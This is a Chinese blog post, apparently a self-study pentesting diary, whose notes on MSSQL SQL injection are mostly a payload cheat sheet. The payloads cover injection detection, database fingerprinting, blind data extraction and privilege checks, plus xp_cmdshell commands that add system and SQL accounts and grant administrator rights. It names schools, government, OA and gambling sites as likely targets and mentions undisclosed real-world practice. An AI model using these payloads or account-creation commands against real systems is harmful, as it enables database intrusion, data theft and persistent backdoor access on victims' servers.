Re:从零开始的渗透测试废物自学日记(2021.1.13)

今日学习大纲:
mssql数据库的理解和注入(学习过程包含实战,因存在敏感信息,不外放)

容易存在注入的系统
学校
政府
oa
游戏
bc

mssql介绍
美国microsoft公司推出的一种关系型数据库系统。sql server是一个可扩展的、高性能的,为分布式客户机/服务器计算所涉及的数据库管理系统,实现了与windowsNT的有机结合,提供了基于事务的企业级信息管理系统方案。
特点有:
(1)高性能设计,可充分利用windowsNT的优势
(2)系统管理先进,支持windows图形化管理工具,支持本地和远程的系统管理和配置
(3)强装的事务处理功能,采用各种方法保证数据的完整性。
(4)支持对称多处理器结构、存储过程、ODBC,并具有自主的SQL语言。SQLserver以其内置的数据复制功能、强大的管理工具、与Internet的紧密继承和开放的系统结构为广大的用户、开发人员和系统集成商提供了一个出众的数据库平台。

mssql服务、端口、后缀
重启服务,使其生效
命令:services.msc
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING
1433端口是开启的。当我们关闭服务后,端口也将关闭。
后缀:*.mdf
日志文件后缀:xxx_log.ldf

mssql数据库权限
sa权限:数据库操作,文件管理,命令执行,注册表读取等(system)
db权限:文件管理,数据库操作等(users-administrators)
public权限:数据库操作(guest-users)

调用数据库代码
<%
set conn = server.createobject("adodb.connection")
conn.open "provider=sqloledb;source=local;uid=sa;pwd=******;database=database-name"
%>
这个代码里面记录了数据库登录账号、密码,用户权限,数据库名称。
一般存在于conn.config/web.config/config等文件中
其中,provider后面的内容就是关键性数据,source后面可以是ip地址;sa是内置的用户,密码是在安装的视乎设置的,database后面跟的是要连接的数据库名称。

注入语句
1.判断是否有注入
and 1=1
and 1=2
'
"
2.判断数据库系统
and (select count() from sysobjects)>0 只有mssql数据库有sysobjects表,显示正常表示是mssql数据库,显示不正常则表示该数据库表示mssql
and (select count(
) from msysobjects)>0 access 同上
3.注入参数是字符
' and [查询条件] and " = '
4.搜索时没过滤参数的
' and [查询条件] and '%25' = '
5.猜表名数量
and (select Count() from [表名])>0
6.猜字段
and (select count(字段名) from 表名)>0
7.猜字段中记录的长度
and (select top 1 len(字段名) from 表名)>0
8.(1)猜字段的ascii值(access)
and (select top 1 asc(mid(字段名,1,1)) from 表名)>0
(2)猜字段的ascii值(mssql)
and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
9.测试权限(mssql)
and 1=(select IS_SRVROLEMEMBER('sysadmin')); --
and 1=(select IS_SRVROLEMEMBER('serveradmin')); --
and 1=(select IS_SRVROLEMEMBER('setupadmin')); --
and 1=(select IS_SRVROLEMEMBER('securityadmin')); --
and 1=(select IS_SRVROLEMEMBER('diskadmin')); --
and 1=(select IS_SRVROLEMEMBER('bulkadmin')); --
and 1=(select IS_SRVROLEMEMBER('db_owner')); --
10.添加mssql和系统的账户
exec master.dbo.sp_addlogin username; --
exec master.dbo.sp_password null,username,password; --
exec master.dbo.sp_addsrvrolemember sysadmin username; --
exec master.dbo.xp_cmdshell 'net user username password /workstations:
/times:all /passwordchg:yes /passwordreq:yes /active:yes /add'; --
exec master.dbo.xp_cmdshell 'net user username password /add'; --
exec master.dbo.xp_cmdshell 'net localgroup administrators username /add'; --

判断数据库版本情况
and 1=(select @@version)

基本信息搜集
1.注入点权限判断
and 1=(select is_srvrolemember('sysadmin')) //判断是否是系统管理员
and 1=(select is_srvrolemember('db_owner')) //判断是否是库权限
and 1=(select is_srvrolemember('public')) //判断是否为public权限
and 1=convert(int,db_name())或1=(select db_name()) //当前数据库名
and 1=(select @@servername) //本地服务名
and 1=(select HAS_DBACCESS('master')) //判断是否有库读取权限

posted @ 2021-01-13 20:15  小明-o3rr0r  阅读(266)  评论(0编辑  收藏  举报